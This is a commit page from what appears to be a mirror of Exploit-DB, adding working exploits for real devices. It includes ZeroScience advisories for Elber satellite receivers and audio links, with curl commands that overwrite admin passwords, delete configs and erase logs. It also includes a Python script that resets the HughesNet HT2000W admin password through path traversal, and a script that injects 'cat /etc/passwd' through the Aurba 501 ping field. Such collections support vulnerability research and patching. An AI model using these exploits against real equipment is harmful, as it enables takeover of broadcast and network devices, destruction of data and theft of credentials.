bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-08-25

Browse source 
7 changes to exploits/shellcodes/ghdb

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config
Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass
Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure

HughesNet HT2000W Satellite Modem - Password Reset

Aurba 501 - Authenticated RCE
This commit is contained in:
Exploit-DB 2024-08-25 00:16:25 +00:00
parent 809d81619e
commit 76d99ff06e
7 changed files with 470 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
exploits/hardware/webapps/52069.txt Normal file
View file

@ -0,0 +1,68 @@
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
1.5.56 Revision 884
1.229 Revision 440
Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5820
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

69
exploits/hardware/webapps/52070.txt Normal file
View file

@ -0,0 +1,69 @@
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
1.5.56 Revision 884
1.229 Revision 440
Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5821
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

70
exploits/hardware/webapps/52071.txt Normal file
View file

@ -0,0 +1,70 @@
Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.
Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.
--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }
--------------------------------------------------------------------------
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5822
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5822.php
18.08.2023
--
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
Ref (lev param):
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)

71
exploits/hardware/webapps/52072.txt Normal file
View file

@ -0,0 +1,71 @@
Elber Wayber Analog/Digital Audio STL 4.00 Device Config
Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516)
Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350)
Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342)
Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131)
Summary: Wayber II is the name of an analogue/digital microwave link
able to transport a Mono or a MPX stereo signal from studio to audio
transmitter. Compact and reliable, it features very high quality and
modern technology both in signal processing and microwave section leading
to outstanding performances.
Desc: The device suffers from an unauthenticated device configuration and
client-side hidden functionality disclosure.
Tested on: NBFM Controller
embOS/IP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5823
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php
18.08.2023
--
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied
# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully
# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully
# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased
# Until:
# =0 ALL
# =-2 Yesterday
# =-8 Last week
# =-15 Last two weeks
# =-22 Last three weeks
# =-31 Last month
# Set RX config
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'
RX Config Applied Successfully
# Show factory window and FPGA upload (Console)
> cleber_show_factory_wnd()
# Etc.

96
exploits/hardware/webapps/52073.py Executable file
View file

@ -0,0 +1,96 @@
# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset
# Date: 7/16/24
# Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com>
# Vendor: HughesNet
# Version: Arcadyan httpd 1.0
# Tested on: Linux
# CVE: CVE-2021-20090
import sys
import requests
import re
import base64
import hashlib
import urllib
red = "\033[0;41m"
green = "\033[1;34;42m"
reset = "\033[0m"
def print_banner():
print(green + '''
_____________ _______________ _______________ ________ ____ _______________ _______ _______________
\_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \_____ \ _ \ \ _ \/ __ \ _ \
/ \ \/\ Y / | __)_ ______ / ____/ /_\ \ / ____/ | | ______ / ____/ /_\ \/ /_\ \____ / /_\ \
\ \____\ / | \ /_____/ / \ \_/ \/ \ | | /_____/ / \ \_/ \ \_/ \ / /\ \_/ \
\______ / \___/ /_______ / \_______ \_____ /\_______ \|___| \_______ \_____ /\_____ //____/ \_____ /
\/ \/ \/ \/ \/ \/ \/ \/ \/ \n''' + reset)
print(" Administrator password reset for HughesNet HT2000W Satellite Modem")
print('''
Usage: python3 hughes_ht2000w_pass_reset.py <password> <ip_address>
<password>: The new administrator password
<ip_address>: The IP address of the web portal. If none is provided, the script will default to 192.168.42.1\n
This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset
the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as
improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')
return None
def get_httoken(ip_address):
# Make a GET request to system_p.htm using path traversal
r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')
if r.status_code != 200:
print(red + f"(-) Failure: Could not request system_p.htm" + reset)
exit()
# Extract the httoken hidden in the DOM and convert it from Base64
return base64.b64decode(re.search(r'AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')
def encode_pass(password):
# Vigenere Cipher
key = "wg7005d"
enc_pass = ""
idx = 0
for c in password:
enc_pass += str(ord(c) + ord(key[idx])) + "+"
idx = (idx + 1) % len(key)
return enc_pass
def change_pass(ip_address, httoken, enc_pass):
# Create a POST request with the httoken and the encoded password
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}
payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}
payload = urllib.parse.urlencode(payload, safe=':+')
try:
r = requests.post(f'http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)
except:
pass
return None
def verify_pass(ip_address, new_pass):
# Make a GET request to cgi_sys_p.js to verify password
httoken = get_httoken(ip_address)
headers = {'Referer': f'http://{ip_address}/system_p.htm'}
r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)
if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():
print(red + "(-) Failure: Could not verify the hash of the password" + reset)
exit()
def main():
if not (len(sys.argv) == 2 or len(sys.argv) == 3):
print_banner()
return
new_pass = sys.argv[1]
ip_address = "192.168.42.1"
if sys.argv == 3:
ip_address = sys.argv[2]
httoken = get_httoken(ip_address)
print(f"[+] Obtained httoken: {httoken}")
enc_pass = encode_pass(new_pass)
change_pass(ip_address, httoken, enc_pass)
print(f"[+] Password reset to: {new_pass}")
verify_pass(ip_address, new_pass)
print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())
print("[+] Password successfully changed!")
return
if __name__ == '__main__':
main()

90
exploits/linux/webapps/52074.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux
import requests
from requests.auth import HTTPBasicAuth
def get_input(prompt, default_value):
user_input = input(prompt)
return user_input if user_input else default_value
base_url = input("Enter the base URL: ")
if not base_url:
print("Base URL is required.")
exit(1)
username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")
login_url = f"{base_url}/login.cgi"
login_payload = {
"username": username,
"password": password,
"login": "Login"
}
login_headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Connection": "close"
}
session = requests.Session()
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)
# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
print("Login successful!")
# The command to be executed on the device
command = "cat /etc/passwd"
ping_ip = f"4.2.2.4||{command}"
# Data to be sent in the POST request
data = {
"ping_ip": ping_ip,
"ping_timeout": "1",
"textareai": "",
"ping_start": "Ping"
}
# Headers to be sent with the request
headers = {
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": base_url,
"Referer": f"{base_url}/admin.cgi?action=ping",
"Connection": "close"
}
# Sending the HTTP POST request to exploit the vulnerability
exploit_url = f"{base_url}/admin.cgi?action=ping"
response = session.post(exploit_url, headers=headers, data=data, verify=False)
if any("root" in value for value in response.headers.values()):
print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
print(response.headers)
else:
print("Exploit failed. The response headers did not contain the expected output.")
else:
print("Login failed. Please check the credentials and try again.")
# Print the response headers for further analysis
print(response.headers)

6
files_exploits.csv
View file

@ -4372,10 +4372,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48764,exploits/hardware/webapps/48764.txt,"Eibiz i-Media Server Digital Signage 3.8.0 - Configuration Disclosure",2020-08-24,LiquidWorm,webapps,hardware,,2020-08-24,2020-08-24,0,,,,,,
48774,exploits/hardware/webapps/48774.py,"Eibiz i-Media Server Digital Signage 3.8.0 - Privilege Escalation",2020-08-28,LiquidWorm,webapps,hardware,,2020-08-28,2020-08-28,0,,,,,,
52004,exploits/hardware/webapps/52004.txt,"Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52069,exploits/hardware/webapps/52069.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
52070,exploits/hardware/webapps/52070.txt,"Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Device Config",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
52006,exploits/hardware/webapps/52006.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52007,exploits/hardware/webapps/52007.txt,"Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52002,exploits/hardware/webapps/52002.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Authentication Bypass",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52003,exploits/hardware/webapps/52003.txt,"Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 - Device Config Disclosure",2024-05-04,LiquidWorm,webapps,hardware,,2024-05-04,2024-05-04,0,,,,,,
52071,exploits/hardware/webapps/52071.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Authentication Bypass",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
52072,exploits/hardware/webapps/52072.txt,"Elber Wayber Analog/Digital Audio STL 4.00 - Device Config Disclosure",2024-08-24,LiquidWorm,webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
51771,exploits/hardware/webapps/51771.txt,"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51772,exploits/hardware/webapps/51772.txt,"Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51770,exploits/hardware/webapps/51770.txt,"Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure",2024-02-02,LiquidWorm,webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@ -4516,6 +4520,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
10276,exploits/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,webapps,hardware,,2009-12-02,,1,OSVDB-60666;CVE-2009-4197;OSVDB-60646;OSVDB-60645;OSVDB-60644;OSVDB-60643;OSVDB-60642;OSVDB-60641;OSVDB-60640;OSVDB-60639;CVE-2009-4196,,,,,
43414,exploits/hardware/webapps/43414.py,"Huawei Router HG532 - Arbitrary Command Execution",2017-12-25,anonymous,webapps,hardware,37215,2018-01-01,2018-01-01,0,CVE-2017-17215,,,,,https://pastebin.com/4nzunPB5
45991,exploits/hardware/webapps/45991.py,"Huawei Router HG532e - Command Execution",2018-12-14,Rebellion,webapps,hardware,,2018-12-14,2018-12-14,0,CVE-2015-7254,,,,,
52073,exploits/hardware/webapps/52073.py,"HughesNet HT2000W Satellite Modem - Password Reset",2024-08-24,"Simon Greenblatt",webapps,hardware,,2024-08-24,2024-08-24,0,,,,,,
42284,exploits/hardware/webapps/42284.py,"Humax HG100R 2.0.6 - Backup File Download",2017-06-30,gambler,webapps,hardware,,2017-06-30,2017-06-30,0,,,,,,
42732,exploits/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,webapps,hardware,,2017-09-15,2017-10-03,0,CVE-2017-11435,,,,,
39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,webapps,hardware,80,2016-06-15,2016-06-15,0,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
@ -8917,6 +8922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45933,exploits/linux/webapps/45933.py,"Apache Superset < 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,,2018-12-03,2018-12-05,0,CVE-2018-8021,,,,http://www.exploit-db.comincubator-superset-0.22.0.tar.gz,
47900,exploits/linux/webapps/47900.txt,"ASTPP 4.0.1 VoIP Billing - Database Backup Download",2020-01-10,"Fabien AUNAY",webapps,linux,,2020-01-10,2020-01-10,0,,,,,,
20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,webapps,linux,,2012-07-23,2012-07-23,1,OSVDB-84397,,,,,
52074,exploits/linux/webapps/52074.py,"Aurba 501 - Authenticated RCE",2024-08-24,"Hosein Vita",webapps,linux,,2024-08-24,2024-08-24,0,,,,,,
21836,exploits/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload (Metasploit)",2012-10-10,Metasploit,webapps,linux,,2012-10-10,2012-10-10,1,OSVDB-85554,"Metasploit Framework (MSF)",,,,
40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' (Authenticated) Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80,2016-07-29,2016-07-29,0,CVE-2015-8257,,,,,http://www.orwelllabs.com/2016/01/axis-commucations-multiple-products.html
47150,exploits/linux/webapps/47150.txt,"Axway SecureTransport 5 - Unauthenticated XML Injection",2019-07-22,"Dominik Penner",webapps,linux,,2019-07-22,2019-07-22,0,,,,,,

Can't render this file because it is too large.